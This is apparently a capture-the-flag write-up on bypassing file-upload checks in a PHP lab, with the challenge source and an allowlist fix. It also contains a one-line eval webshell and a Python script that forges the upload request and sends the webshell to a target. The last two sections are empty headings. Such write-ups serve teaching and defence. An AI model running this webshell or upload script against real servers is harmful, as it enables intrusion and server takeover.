1.5 Webshell file upload vulnerability analysis and traceability (1~4)

Webshell file upload vulnerability analysis and traceability (question 1)

Let's first look at the basic page:

Upload 1.php ----> rejected (screenshot not preserved), well, as expected.

Upload 1.png ----> (screenshot not preserved).

We look at the page elements -----> (screenshot not preserved), and there is no front-end validation.

So it seems we can only capture the request with Burp and modify it to bypass the check: rename 1.php ----> 1.php .png, then in the captured request change the space (0x20) -----> a null byte (0x00), so the filename becomes 1.php\x00.png. The idea is that an extension check sees .png while the file-system call truncates the name at the null byte. Note that this only works on PHP older than 5.3.4; since that release paths containing a null byte are rejected, so the trick is unlikely to succeed on a current PHP.


 

Looking at other people's write-ups, I found that it is a simple blacklist bypass: just upload 1.php3, 1.php4 or 1.php5. The server only filters the exact .php extension... careless of me.

Connect with China Chopper (Caidao): (screenshot not preserved). Well, that's a slap in the face....

Now let's take a look at the source code:

index.php

<!doctype html>
<html lang="zh-cn">
<head>
<meta charset="utf-8">
<title>Upload</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="">
<link href="static/bootstrap.css" rel="stylesheet">
<link href="static/cover.css" rel="stylesheet">
<script src="static/jquery.js"></script>
<script src="static/bootstrap.js"></script>
</head>
<body>
<div class="site-wrapper">
  <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload">
    <h3>Please select a file to upload:</h3>
    <input class="form-control" type="file" name="upfile"/>
    <input type="submit" name="submit" value="Upload file"/>
  </form>
</div>
</body>
</html>

upload.php

<?php
// Server-side extension check for the file upload vulnerability demo
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$uploaddir = 'uploads/';
if (isset($_POST['submit'])) {
    if (file_exists($uploaddir)) {
        // Blacklist: only these four exact, lower-case extensions are rejected
        $deny_ext = array('.asp', '.php', '.aspx', '.jsp');
        // strrchr() returns everything from the LAST dot, e.g. ".php3" for 1.php3
        $file_ext = strrchr($_FILES['upfile']['name'], '.');
        // in_array() compares case-sensitively, so ".PHP" and ".php3" both pass
        if (!in_array($file_ext, $deny_ext)) {
            // The client-supplied name is used unchanged as the destination path
            if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) {
                echo 'File uploaded successfully, saved at: ' . $uploaddir . $_FILES['upfile']['name'] . "\n";
            }
        } else {
            echo 'This file is not allowed to upload' . "\n";
        }
    } else {
        exit($uploaddir . ' folder does not exist, please create it manually');
    }
    //print_r($_FILES);
}
?>

It uses a blacklist, so a plain .php is rejected, but the check only compares the last extension against four exact strings. Where the web server's handler mapping (for example an Apache AddHandler/AddType line) also lists .php3, .php4 and .php5, files with those extensions are executed by PHP exactly like .php. Two further gaps are worth noting: in_array() is case-sensitive, so 1.PHP passes the check as well, and the file is stored under the client-supplied name, so the uploader controls the path inside uploads/.
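To make the weakness concrete, here is an added example (not code from the original write-up or the challenge) that ports the blacklist logic above to Python and runs it beside an allowlist version over a set of constructed upload names, including the 1.php3 bypass, the case variant, the null-byte name from question 1 and a legitimate PNG. The hardened check is my own illustration of what the fix looks like, not a fix shipped with the challenge.

```python
import os
import re
import secrets

# Constructed sample uploads for this example: (filename as sent in the multipart
# Content-Disposition header, first bytes of the file body).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_STUB = b"<?php eval($_POST['123']); ?>"

SAMPLES = [
    ("1.php", PHP_STUB),
    ("1.php3", PHP_STUB),          # blacklist bypass used in question 1
    ("1.PHP", PHP_STUB),           # in_array() is case-sensitive
    ("1.php\x00.png", PHP_STUB),   # null-byte attempt from the write-up
    ("1.png", PNG_MAGIC + b"\x00" * 16),
    ("shell", PHP_STUB),           # no extension at all
]

DENY_EXT = [".asp", ".php", ".aspx", ".jsp"]   # same list as upload.php


def vulnerable_allows(filename: str) -> bool:
    """Mirror of the challenge's check: strrchr($name, '.') against a blacklist.

    strrchr() returns the substring from the LAST dot, so "1.php\\x00.png" yields
    ".png"; a name without any dot yields false, which is not in the list either.
    """
    idx = filename.rfind(".")
    if idx == -1:
        return True
    return filename[idx:] not in DENY_EXT


# Allowlist of extension -> magic bytes the body must start with.
ALLOW = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}


def hardened_store_name(filename: str, head: bytes):
    """Allowlist version of the same check (added illustration, not the challenge's code).

    Returns the name the file would be stored under, or None to reject:
    - basename() drops any directory components the client supplied
    - control characters (NUL included) are rejected outright
    - the extension is lower-cased and must be in the allowlist
    - the body must start with the magic bytes for that extension
    - the stored name is random, so the client never chooses the server-side path
    """
    name = os.path.basename(filename.replace("\\", "/"))
    if re.search(r"[\x00-\x1f]", name):
        return None
    idx = name.rfind(".")
    if idx <= 0:
        return None
    ext = name[idx:].lower()
    magic = ALLOW.get(ext)
    if magic is None or not head.startswith(magic):
        return None
    return secrets.token_hex(16) + ext


def compare(samples=SAMPLES):
    """Run both checks; returns {filename: (blacklist allows, allowlist allows)}."""
    return {
        name: (vulnerable_allows(name), hardened_store_name(name, head) is not None)
        for name, head in samples
    }


if __name__ == "__main__":
    for name, (vuln, hard) in compare().items():
        print(f"{name!r:18} blacklist: {'ALLOW' if vuln else 'deny':5}  "
              f"allowlist: {'ALLOW' if hard else 'deny'}")
```

Only 1.php is stopped by the blacklist; every other webshell name goes through, while the allowlist version admits only the PNG with a valid header and stores it under a random name.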

 

Webshell file upload vulnerability analysis and traceability (question 2)

This time we upload 1.php3: (screenshot not preserved)

Upload 1.png: (screenshot not preserved)

Then we rename 1.php ---> 1.jpg and look at the page source code:

<!doctype html>
<html lang="zh-cn">
<head>
<meta charset="utf-8">
<title>Upload</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="">
<link href="static/bootstrap.css" rel="stylesheet">
<link href="static/cover.css" rel="stylesheet">
<script src="static/jquery.js"></script>
<script src="static/bootstrap.js"></script>
<script language="JavaScript">
// Client-side extension check: runs only in the browser, never on the server
extArray = new Array(".gif", ".jpg", ".png");
function LimitAttach(form, file) {
    allowSubmit = false;
    if (!file) return;
    // Strip the "C:\fakepath\" prefix browsers put in front of the file name
    while (file.indexOf("\\") != -1)
        file = file.slice(file.indexOf("\\") + 1);
    // indexOf() takes everything from the FIRST dot, so "1.php.jpg" gives ".php.jpg"
    ext = file.slice(file.indexOf(".")).toLowerCase();
    for (var i = 0; i < extArray.length; i++) {
        if (extArray[i] == ext) { allowSubmit = true; break; }
    }
    if (allowSubmit) form.submit();
    else
        alert("Sorry, you can only upload files in the following formats: "
            + (extArray.join(" ")) + "\nPlease re-select the eligible files"
            + "Upload again.");
    return false;
}
</script>
</head>
<body>
<div class="site-wrapper">
  <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload">
    <h3>Please select a file to upload:</h3>
    <input class="form-control" type="file" name="uploadfile"/>
    <input type="submit" name="submit" value="Upload file" onclick="return LimitAttach(this.form, this.form.uploadfile.value)"/>
  </form>
</div>
</body>
</html>

So the front end has JavaScript validation that only lets files with an image extension (.gif, .jpg, .png) through. The check runs entirely in the browser and nothing re-checks on the server, so there are two ways past it:

The first: rename the one-line webshell 1.php to 1.jpg so the check passes, then use Burp Suite to change the filename in the intercepted request back to 1.php. After the upload succeeds, connect with China Chopper (Caidao) and find the key.

The second: in Firefox enter about:config in the address bar, search for javascript.enabled and toggle it to false. This disables JavaScript, so the front-end check never runs. Create the webshell <?php eval($_POST['123']); ?>, upload it directly, note the returned path uploads/1.php, and then connect with China Chopper.
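As an added example (not code from the original write-up), the following Python script walks through the first method without Burp: it ports the page's LimitAttach() check to show which names the browser would submit, builds the multipart body the form sends to upload.php, rewrites the filename field the way one would in Burp's intercept, and shows the name the server ends up with. The boundary string, the webshell body and the target URL are constructed for this example; the challenge's real host is not on the page.

```python
import re
import urllib.request

# Constructed values for this example (not from the original page)
BOUNDARY = "----WebKitFormBoundaryExample0000"
WEBSHELL = b"<?php eval($_POST['123']); ?>\n"
TARGET = "http://127.0.0.1/upload.php"   # assumed; replace with the real challenge URL

EXT_ARRAY = [".gif", ".jpg", ".png"]     # same list as the page's LimitAttach()


def client_check(filename: str) -> bool:
    """Port of the page's LimitAttach(): True when the browser would submit the form.

    It slices from the FIRST dot (indexOf), so "1.php.jpg" yields ".php.jpg" and is
    refused even though it ends in .jpg; a name without a dot fails too. None of this
    matters to an attacker, because it runs in the attacker's own browser.
    """
    while "\\" in filename:                      # strip the "C:\fakepath\" prefix
        filename = filename[filename.index("\\") + 1:]
    if "." not in filename:
        return False
    ext = filename[filename.index("."):].lower()
    return ext in EXT_ARRAY


def build_multipart(field: str, filename: str, body: bytes, boundary: str = BOUNDARY) -> bytes:
    """Body of the POST the form sends to upload.php, as Burp's proxy history would show it."""
    part = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n"      # upload.php never looks at this
    ).encode() + body
    submit = (
        f"\r\n--{boundary}\r\n"
        'Content-Disposition: form-data; name="submit"\r\n\r\n'
        f"Upload file\r\n--{boundary}--\r\n"
    ).encode()
    return part + submit


FILENAME_RE = re.compile(rb'filename="([^"\r\n]*)"')


def rewrite_filename(raw: bytes, new_name: str) -> bytes:
    """The Burp edit: change filename="..." in the intercepted request, leave the rest alone."""
    return FILENAME_RE.sub(b'filename="' + new_name.encode() + b'"', raw, count=1)


def server_filename(raw: bytes) -> str:
    """What $_FILES['uploadfile']['name'] will contain once PHP parses the body."""
    m = FILENAME_RE.search(raw)
    return m.group(1).decode() if m else ""


def bypass(disguise: str = "1.jpg", real_name: str = "1.php"):
    """The first method from the write-up. Returns (browser accepts disguise,
    browser accepts real name, name the server sees, request body to forward)."""
    captured = build_multipart("uploadfile", disguise, WEBSHELL)
    forwarded = rewrite_filename(captured, real_name)
    return client_check(disguise), client_check(real_name), server_filename(forwarded), forwarded


def send(body: bytes, url: str = TARGET) -> str:
    """Forward the edited request (Burp's Forward button); needs a live target."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={BOUNDARY}")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    ok_jpg, ok_php, seen, body = bypass()
    print(f"browser submits 1.jpg: {ok_jpg}, browser submits 1.php: {ok_php}, server sees: {seen}")
    print(body.decode())
```

The browser refuses to submit 1.php but happily submits 1.jpg; one edit to the intercepted body later, the server stores the same bytes as uploads/1.php because nothing on the server side validates the name in this question.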

 

 

Webshell file upload vulnerability analysis and traceability (question 3)

 

 

 

Webshell file upload vulnerability analysis and traceability (question 4)

 

 
